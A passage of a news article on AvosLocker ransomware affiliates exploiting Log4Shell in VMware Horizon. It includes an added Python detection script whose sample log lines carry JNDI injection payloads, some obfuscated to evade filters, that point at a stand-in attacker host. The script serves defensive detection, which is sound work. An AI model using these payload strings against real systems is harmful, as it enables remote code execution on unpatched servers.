Ransomware Gang Uses Log4Shell – BankInfoSecurity


AvosLocker Makes Use of Unpatched VMWare Virtual Desktop Software


Log4Shell is the vulnerability that keeps giving with yet another ransomware group at work exploiting a bug present in a ubiquitous open-source data-logging framework.


Analysis by Cisco Talos shows actors affiliated with the ransomware-as-a-service group AvosLocker exploiting unpatched VMware virtual desktop software that still contains the vulnerability.

The Apache Software Foundation in December set off a global race between systems administrators and hackers when it fixed a bug, identified by security researchers, in the Java-based Log4j logging utility. Despite a flurry of warnings, some systems remain unpatched and open to exploitation.

A study of a campaign involving Avos ransomware showed hackers managed to gain access to an unidentified organization via a pair of VMware Horizon applications (see: Log4Shell Update: VMware Horizon Targeted).

Attack Analysis

AvosLocker has been active since 2021 and follows a RaaS model – its operators handle negotiation and extortion practices for affiliates.

Typically, Avos actors use spam email campaigns as an initial infection vector to deploy ransomware. But in this case, Cisco Talos discovered that they leveraged an internet-exposed ESXi server reached through a VMware Horizon Unified Access Gateway that was vulnerable to Log4Shell.
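The exploitation path described above hinges on an attacker-controlled `${jndi:...}` lookup string reaching a vulnerable Log4j instance through a request field that the Horizon components write to their logs. As an added example that is not from the article or from Cisco Talos, the following Python scans web-server access-log lines for such lookups, including the nested `${lower:...}` and `${::-...}` obfuscation that plain substring matching misses. The log lines, IP addresses and hostnames are constructed for the example; the lookup shapes themselves are the widely published detection signatures for Log4Shell probing.

```python
import re

# Constructed sample access-log lines (not from the article). Lines 2-4 carry
# Log4Shell probe strings in the User-Agent field; lines 1 and 5 are benign.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [07/Feb/2022:10:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [07/Feb/2022:10:15:07 +0000] "GET /portal/ HTTP/1.1" 404 0 "-" "${jndi:ldap://attacker.invalid/a}"',
    '203.0.113.12 - - [07/Feb/2022:10:15:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.invalid/a}"',
    '203.0.113.13 - - [07/Feb/2022:10:15:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.invalid/x}"',
    '203.0.113.14 - - [07/Feb/2022:10:15:20 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "curl/7.68.0"',
]

# Log4j lookups whose result is just their literal argument:
#   ${lower:j} -> "j", ${upper:j} -> "J"
#   ${::-j} and ${env:MISSING:-j} -> "j" (default value after ":-")
_LOWER_UPPER = re.compile(r"\$\{(lower|upper):([^{}]*)\}")
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The lookup that actually triggers the remote class load; the scheme is captured.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalize_lookups(text: str, max_passes: int = 10) -> str:
    """Collapse literal-valued lookups, innermost first, until nothing changes,
    so a nested spelling of 'jndi' is rewritten into its plain form."""
    for _ in range(max_passes):
        new = _LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(text: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the text carries a JNDI
    lookup in raw or de-obfuscated form, otherwise None."""
    for candidate in (text, normalize_lookups(text)):
        m = _JNDI.search(candidate)
        if m:
            return m.group(1).lower()
    return None


def scan_lines(lines):
    """Scan log lines; each hit records the line number, JNDI scheme and client IP."""
    hits = []
    for n, line in enumerate(lines, start=1):
        scheme = find_jndi(line)
        if scheme:
            hits.append({"line": n, "scheme": scheme, "source": line.split(" ", 1)[0]})
    return hits


if __name__ == "__main__":
    for h in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {h['line']}: JNDI lookup via {h['scheme']} from {h['source']}")
```

Checking both the raw line and its normalized form matters: a Log4j instance evaluates the nested lookups before the `jndi` lookup runs, so a detector that only matches the literal text `${jndi:` sees nothing in lines 3 and 4 even though the vulnerable server would resolve them to the same remote lookup as line 2. A hit on any of these lines against a Horizon or UAG host is a reason to check whether the Log4j patch has actually been applied there.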

The customer whose network was attacked notified Talos on March 7. But the researchers at Talos observed activity dating back to Feb. 7, and found four vulnerabilities associated with Log4Shell – CVE-2021-44228, CVE-2021-45046,